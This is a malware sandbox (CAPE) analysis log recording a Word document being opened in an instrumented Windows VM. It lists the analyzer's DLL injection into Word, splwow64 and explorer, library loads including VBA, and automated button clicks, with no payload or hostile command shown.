Analysis

Category Package Started Completed Duration Log
FILE doc 2019-10-10 00:11:52 2019-10-10 00:16:27 275 seconds Show Log
2019-10-10 01:11:55,000 [root] INFO: Date set to: 10-10-19, time set to: 00:11:55, timeout set to: 200
2019-10-10 01:11:55,030 [root] DEBUG: Starting analyzer from: C:\weesndvahu
2019-10-10 01:11:55,030 [root] DEBUG: Storing results at: C:\ULEoWPzTY
2019-10-10 01:11:55,030 [root] DEBUG: Pipe server name: \\.\PIPE\MdgGvTgKXB
2019-10-10 01:11:55,030 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:11:55,030 [root] INFO: Automatically selected analysis package "doc"
2019-10-10 01:11:55,624 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:11:55,638 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:11:55,638 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:11:56,418 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-10-10 01:11:56,418 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:11:56,434 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL option
2019-10-10 01:11:56,434 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL_64 option
2019-10-10 01:11:56,653 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc" /q" with pid 2360
2019-10-10 01:11:56,653 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:11:56,668 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:11:56,668 [root] DEBUG: Loader: Injecting process 2360 (thread 1912) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:11:56,668 [root] DEBUG: Process image base: 0x2FA00000
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2FB5D000 - 0x77380000
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: Allocated 0x178 bytes for new import table at 0x2FB60000.
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:56,684 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:11:56,684 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2360
2019-10-10 01:11:58,727 [lib.api.process] INFO: Successfully resumed process with pid 2360
2019-10-10 01:11:58,727 [root] INFO: Added new process to list with pid: 2360
2019-10-10 01:11:58,805 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:58,852 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,900 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2360 at 0x747a0000, image base 0x2fa00000, stack from 0x166000-0x170000
2019-10-10 01:11:58,900 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc" \q.
2019-10-10 01:11:58,914 [root] INFO: Monitor successfully loaded in process with pid 2360.
2019-10-10 01:11:58,930 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\Comctl32 (0x84000 bytes).
2019-10-10 01:11:59,118 [root] DEBUG: DLL loaded at 0x729E0000: C:\Program Files (x86)\Microsoft Office\Office14\wwlib (0x127b000 bytes).
2019-10-10 01:11:59,148 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:11:59,164 [root] DEBUG: DLL loaded at 0x745F0000: C:\Program Files (x86)\Microsoft Office\Office14\gfx (0x1ab000 bytes).
2019-10-10 01:11:59,180 [root] DEBUG: DLL loaded at 0x74B90000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2019-10-10 01:11:59,196 [root] DEBUG: DLL loaded at 0x74B80000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-10-10 01:11:59,368 [root] DEBUG: DLL loaded at 0x71640000: C:\Program Files (x86)\Microsoft Office\Office14\oart (0x1392000 bytes).
2019-10-10 01:11:59,617 [root] DEBUG: DLL loaded at 0x70450000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-10-10 01:11:59,664 [root] DEBUG: DLL loaded at 0x743B0000: C:\Windows\system32\msi (0x240000 bytes).
2019-10-10 01:11:59,694 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:12:00,288 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-10-10 01:12:00,365 [root] DEBUG: DLL loaded at 0x73E00000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-10-10 01:12:00,490 [root] DEBUG: DLL loaded at 0x73D30000: C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl (0xc9000 bytes).
2019-10-10 01:12:00,599 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:12:00,694 [root] DEBUG: DLL loaded at 0x70390000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS (0xbc000 bytes).
2019-10-10 01:12:00,911 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-10-10 01:12:01,084 [root] DEBUG: DLL loaded at 0x70240000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-10-10 01:12:01,145 [root] DEBUG: DLL loaded at 0x6BD10000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-10-10 01:12:01,177 [root] DEBUG: DLL loaded at 0x6BAA0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-10-10 01:12:01,364 [root] INFO: Announced 32-bit process name:  pid: 154729807
2019-10-10 01:12:01,364 [lib.api.process] WARNING: The process with pid 154729807 is not alive, injection aborted
2019-10-10 01:12:01,380 [root] DEBUG: DLL loaded at 0x6BA50000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-10-10 01:12:01,395 [root] DEBUG: set_caller_info: Adding region at 0x00570000 to caller regions list (kernel32::FindFirstFileExW).
2019-10-10 01:12:01,457 [root] DEBUG: set_caller_info: Adding region at 0x01F60000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:12:01,489 [root] DEBUG: DLL loaded at 0x6B9D0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-10-10 01:12:01,816 [root] DEBUG: DLL loaded at 0x6B9B0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-10-10 01:12:01,987 [root] DEBUG: DLL loaded at 0x6B990000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-10-10 01:12:02,098 [root] DEBUG: DLL loaded at 0x6B930000: C:\Windows\system32\Winspool.DRV (0x51000 bytes).
2019-10-10 01:12:02,269 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-10-10 01:12:02,285 [root] DEBUG: DLL unloaded from 0x75700000.
2019-10-10 01:12:02,285 [root] DEBUG: DLL loaded at 0x6B900000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:12:02,299 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:12:02,299 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:12:02,299 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:12:02,315 [root] DEBUG: DLL unloaded from 0x6B900000.
2019-10-10 01:12:02,471 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-10-10 01:12:02,487 [root] DEBUG: DLL unloaded from 0x2FA00000.
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x6B830000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-10-10 01:12:02,519 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:12:02,519 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:12:02,628 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:12:02,628 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:12:02,658 [root] DEBUG: DLL loaded at 0x6B820000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:12:02,845 [root] DEBUG: DLL loaded at 0x6B6C0000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-10-10 01:12:03,142 [root] DEBUG: DLL loaded at 0x6B6B0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-10-10 01:12:03,424 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-10-10 01:12:03,438 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:12:03,454 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:12:03,470 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-10-10 01:12:03,470 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:12:03,641 [root] DEBUG: DLL loaded at 0x6B470000: C:\Program Files (x86)\Microsoft Office\Office14\GKWord (0x238000 bytes).
2019-10-10 01:12:03,813 [root] DEBUG: DLL unloaded from 0x6B470000.
2019-10-10 01:12:05,184 [modules.auxiliary.human] INFO: Found button "&Yes", clicking it
2019-10-10 01:12:07,311 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 2616
2019-10-10 01:12:07,311 [lib.api.process] INFO: 64-bit DLL to inject is C:\weesndvahu\dll\rOFlTO.dll, loader C:\weesndvahu\bin\FqneazpL.exe
2019-10-10 01:12:07,357 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:07,357 [root] DEBUG: Loader: Injecting process 2616 (thread 2964) with C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,357 [root] DEBUG: Process image base: 0x00000000FF3F0000
2019-10-10 01:12:07,357 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,357 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF404000 - 0x000007FEFF6A0000
2019-10-10 01:12:07,388 [root] DEBUG: InjectDllViaIAT: Allocated 0x204 bytes for new import table at 0x00000000FF410000.
2019-10-10 01:12:07,388 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:07,388 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,404 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2616
2019-10-10 01:12:07,404 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 2616
2019-10-10 01:12:07,404 [lib.api.process] INFO: 64-bit DLL to inject is C:\weesndvahu\dll\rOFlTO.dll, loader C:\weesndvahu\bin\FqneazpL.exe
2019-10-10 01:12:07,404 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:07,404 [root] DEBUG: Loader: Injecting process 2616 (thread 2964) with C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,404 [root] DEBUG: Process image base: 0x00000000FF3F0000
2019-10-10 01:12:07,404 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,404 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:07,404 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,420 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2616
2019-10-10 01:12:07,513 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:12:07,529 [root] INFO: Disabling sleep skipping.
2019-10-10 01:12:07,591 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:12:07,591 [root] WARNING: Unable to hook LockResource
2019-10-10 01:12:07,607 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:12:07,622 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2616 at 0x000000006B5D0000, image base 0x00000000FF3F0000, stack from 0x0000000000205000-0x0000000000210000
2019-10-10 01:12:07,622 [root] DEBUG: Commandline: C:\Windows\splwow64.exe 12288.
2019-10-10 01:12:07,622 [root] INFO: Added new process to list with pid: 2616
2019-10-10 01:12:07,622 [root] INFO: Monitor successfully loaded in process with pid 2616.
2019-10-10 01:12:07,654 [root] DEBUG: DLL loaded at 0x000007FEFD270000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:12:07,668 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-10-10 01:12:07,700 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-10-10 01:12:07,716 [root] DEBUG: DLL loaded at 0x000007FEFC760000: C:\Windows\system32\credssp (0xa000 bytes).
2019-10-10 01:12:07,732 [root] DEBUG: DLL unloaded from 0x000007FEFCB60000.
2019-10-10 01:12:07,746 [root] DEBUG: DLL unloaded from 0x6B930000.
2019-10-10 01:12:07,871 [root] DEBUG: DLL loaded at 0x000007FEF78B0000: C:\Windows\system32\spool\DRIVERS\x64\3\unidrvui (0xdc000 bytes).
2019-10-10 01:12:07,888 [root] DEBUG: DLL loaded at 0x000007FEFC430000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 01:12:07,888 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-10-10 01:12:08,028 [root] DEBUG: DLL loaded at 0x000007FEFA960000: C:\Windows\system32\spool\DRIVERS\x64\3\SendToOneNoteUI (0x12000 bytes).
2019-10-10 01:12:08,059 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,059 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:08,075 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,105 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:08,214 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,214 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,246 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,246 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,292 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,309 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,371 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,403 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,448 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,448 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,496 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,526 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,573 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,621 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:08,651 [root] DEBUG: DLL loaded at 0x000007FEF36A0000: C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv (0xb2000 bytes).
2019-10-10 01:12:08,714 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,901 [root] DEBUG: DLL loaded at 0x000007FEF9A50000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-10-10 01:12:08,980 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:09,010 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,010 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:09,026 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,072 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:09,135 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,135 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:09,229 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,229 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:09,759 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,040 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:10,072 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,072 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,118 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,150 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,384 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:10,398 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,618 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:10,632 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,632 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,664 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,696 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,726 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:10,773 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,789 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:10,821 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,835 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,851 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,007 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,007 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:11,039 [root] DEBUG: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\prntvpt (0x2a000 bytes).
2019-10-10 01:12:11,069 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,069 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,085 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,117 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,164 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,164 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,226 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,226 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,273 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,303 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,351 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,490 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,506 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:11,553 [root] DEBUG: DLL unloaded from 0x000007FEF9A20000.
2019-10-10 01:12:11,569 [root] DEBUG: DLL loaded at 0x000007FEF7880000: C:\Windows\system32\prntvpt (0x2a000 bytes).
2019-10-10 01:12:11,585 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,585 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,601 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,647 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,694 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,694 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,740 [root] DEBUG: DLL loaded at 0x6B530000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10 (0x9e000 bytes).
2019-10-10 01:12:11,835 [root] DEBUG: DLL loaded at 0x6B3A0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-10-10 01:12:11,881 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:12:11,959 [root] DEBUG: DLL loaded at 0x6B2A0000: C:\Windows\system32\WindowsCodecs (0xfb000 bytes).
2019-10-10 01:12:12,832 [root] DEBUG: DLL loaded at 0x6B240000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-10-10 01:12:12,894 [root] DEBUG: DLL loaded at 0x6AFB0000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-10-10 01:12:12,927 [root] DEBUG: set_caller_info: Adding region at 0x00070000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:12:12,973 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-10-10 01:12:13,019 [root] DEBUG: set_caller_info: Adding region at 0x0AE70000 to caller regions list (ntdll::memcpy).
2019-10-10 01:12:13,737 [root] DEBUG: DLL loaded at 0x6AF50000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-10-10 01:12:13,769 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1708
2019-10-10 01:12:13,769 [lib.api.process] INFO: 64-bit DLL to inject is C:\weesndvahu\dll\rOFlTO.dll, loader C:\weesndvahu\bin\FqneazpL.exe
2019-10-10 01:12:13,785 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:13,785 [root] DEBUG: Loader: Injecting process 1708 (thread 0) with C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:13,799 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1712, handle 0x84
2019-10-10 01:12:13,799 [root] DEBUG: Process image base: 0x00000000FFA80000
2019-10-10 01:12:13,799 [root] DEBUG: set_caller_info: Adding region at 0x05610000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:12:13,799 [root] DEBUG: set_caller_info: Adding region at 0x00590000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:12:13,799 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 01:12:13,815 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 01:12:13,815 [root] DEBUG: set_caller_info: Adding region at 0x002D0000 to caller regions list (advapi32::RegCloseKey).
2019-10-10 01:12:13,831 [root] DEBUG: set_caller_info: Adding region at 0x065B0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:12:13,846 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:12:13,862 [root] INFO: Disabling sleep skipping.
2019-10-10 01:12:14,019 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:12:14,019 [root] WARNING: Unable to hook LockResource
2019-10-10 01:12:14,096 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1708 at 0x000000006B5D0000, image base 0x00000000FFA80000, stack from 0x0000000006422000-0x0000000006430000
2019-10-10 01:12:14,096 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 01:12:14,096 [root] INFO: Added new process to list with pid: 1708
2019-10-10 01:12:14,096 [root] DEBUG: set_caller_info: Adding region at 0x00470000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:12:14,111 [root] INFO: Monitor successfully loaded in process with pid 1708.
2019-10-10 01:12:14,111 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:12:14,111 [root] DEBUG: set_caller_info: Adding region at 0x00010000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:12:14,111 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:12:14,128 [root] DEBUG: set_caller_info: Adding region at 0x05FE0000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:12:14,128 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:14,128 [root] DEBUG: set_caller_info: Adding region at 0x00660000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:12:14,267 [root] DEBUG: set_caller_info: Adding region at 0x00460000 to caller regions list (advapi32::RegCloseKey).
2019-10-10 01:12:14,454 [root] DEBUG: set_caller_info: Adding region at 0x00640000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:12:14,502 [root] DEBUG: set_caller_info: Adding region at 0x00430000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:12:16,265 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6EE0000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-10-10 01:12:16,592 [root] DEBUG: set_caller_info: Adding region at 0x00310000 to caller regions list (user32::SendMessageA).
2019-10-10 01:12:17,812 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2019-10-10 01:12:19,375 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:19,375 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:19,796 [root] DEBUG: DLL loaded at 0x6AF10000: C:\Program Files (x86)\Microsoft Office\Office14\msproof7 (0x39000 bytes).
2019-10-10 01:12:19,904 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:19,904 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:19,921 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:19,921 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:19,999 [root] DEBUG: DLL unloaded from 0x6B9B0000.
2019-10-10 01:12:20,013 [root] DEBUG: DLL unloaded from 0x751E0000.
2019-10-10 01:12:20,279 [root] DEBUG: DLL unloaded from 0x6B9B0000.
